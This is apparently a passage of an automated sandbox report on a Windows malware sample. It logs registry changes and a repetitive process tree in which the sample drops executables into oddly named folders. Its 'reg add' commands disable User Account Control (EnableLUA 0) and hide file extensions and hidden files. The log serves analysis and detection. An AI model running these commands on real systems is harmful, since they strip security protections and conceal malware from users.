| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\kSkcMIIs | C:\ProgramData\dyIgEEcE\csUgAwMs.exe | N/A |
Enumerates physical storage devices
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
"C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe"
C:\Users\Admin\kSkcMIIs\duUEccEA.exe
"C:\Users\Admin\kSkcMIIs\duUEccEA.exe"
C:\ProgramData\guYwUoIY\fyAAYsIM.exe
"C:\ProgramData\guYwUoIY\fyAAYsIM.exe"
C:\ProgramData\dyIgEEcE\csUgAwMs.exe
C:\ProgramData\dyIgEEcE\csUgAwMs.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-596646768-802512095622783779-868951223-195724543418692914761190657459-1720438155"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9810981441396653579-1849624713595898508-454275408211637420210607638891375812296"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2172345871209378423-137478335764207028-860254577-16450157491189135076-1950457964"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "193694251662382749215606233-140588349713075674951110542037472729274518400706"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15808430114194992921351289086-1009520093785116381318175564312617550-766454493"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-897312723-179116586347957918914212337941012119365-575955322-977739556538644422"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1585858678134878694-4329983391455858552-9047406632585850401950038754561563785"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2002840291-744457640-589974179-1434134956-19838075432107869803-1227632892-884813411"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "704562590-585285965-377786896-1328209219903737704-772817530-1064819093-142454218"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19243831581432487016838186580-1208101387551380418-583093998315879403-788769682"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2078166580-19389559911292402187-373443740922846530-17403182861745428509-1817076594"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1464464388357939922-3056601989027792417774761571967089542-933394529987516035"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-794179335-1350961775-14197859451460564036-2038009802-133731579317543756781608977565"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "733794590-409830049-19425671791302348956-2044380983111066871415487563931642118925"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1310731163500083244-1855368625-1335343528-16817510041534493641597817377-1050035658"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
